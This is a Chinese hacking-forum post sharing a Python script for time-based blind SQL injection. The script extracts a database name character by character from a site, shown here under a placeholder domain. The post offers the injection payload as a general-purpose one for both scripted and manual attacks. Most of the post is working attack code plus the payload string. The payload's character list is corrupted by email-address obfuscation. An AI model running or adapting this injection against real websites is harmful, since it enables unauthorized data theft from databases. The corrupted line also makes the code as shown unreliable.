搜索
    Hi~登录注册
    查看: 234|回复: 0
    收起左侧

    学python得永生之利用python编写时间盲注脚本

    [复制链接]

    69

    主题

    2

    精华

    31 小时

    在线时间

    注册会员

    Rank: 2

    积分
    119
    发表于 2019-10-9 16:39:24 | 显示全部楼层 |阅读模式
    首先,大牛莫笑,本人虽从业数年,但是一直对编程没有太多的积累,最近因为换工作的事情,夜以继日的学习编程,正好手头有个盲注的案例,遂打算写个脚本出来
    代码如下:
    1. #!/usr/bin/env python
    2. # -*- coding: utf-8 -*-
    3. import requests
    4. import time

    5. payloads = '[email protected]_.%'

    6. user=''
    7. print('Start to retrive current user:')
    8. for i in range(1,23):
    9.         for payload in payloads:
    10.                 try:
    11.                         url = "http://xxoo.com:80/com_hk_list.htm?scat=if(now()=sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(database()," + str(i) + ",1))=" + str(ord(payload)) + ",sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"
    12.                         response=requests.get(url, timeout=10)
    13.                 except requests.exceptions.ReadTimeout:
    14.                         user += payload
    15.                         print('user is:', user)
    16.                         break
    17. print('\n[Done] current user is %s' % user)
    复制代码
    思路嘛,很简单,利用requests对url拼接了payload的链接进行请求,然后遍历出要猜解的内容,注意这个if(now()=sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(database()," + str(i) + ",1))=" + str(ord(payload)) + ",sleep(2),0))OR'\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/" 算是时间盲注里面的通用payload,大家写的时候也可以参考这个payload包刮手工测试也可以用这个,这里之前不加异常处理会导致超时报错,也不知道为什么加了异常处理好了,下面附属一张猜解的图片:
    QQ截图20191009163902.png



    上一篇:对违规成员973791588 的处理公示
    下一篇:对某酒店内网一次渗透测试
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表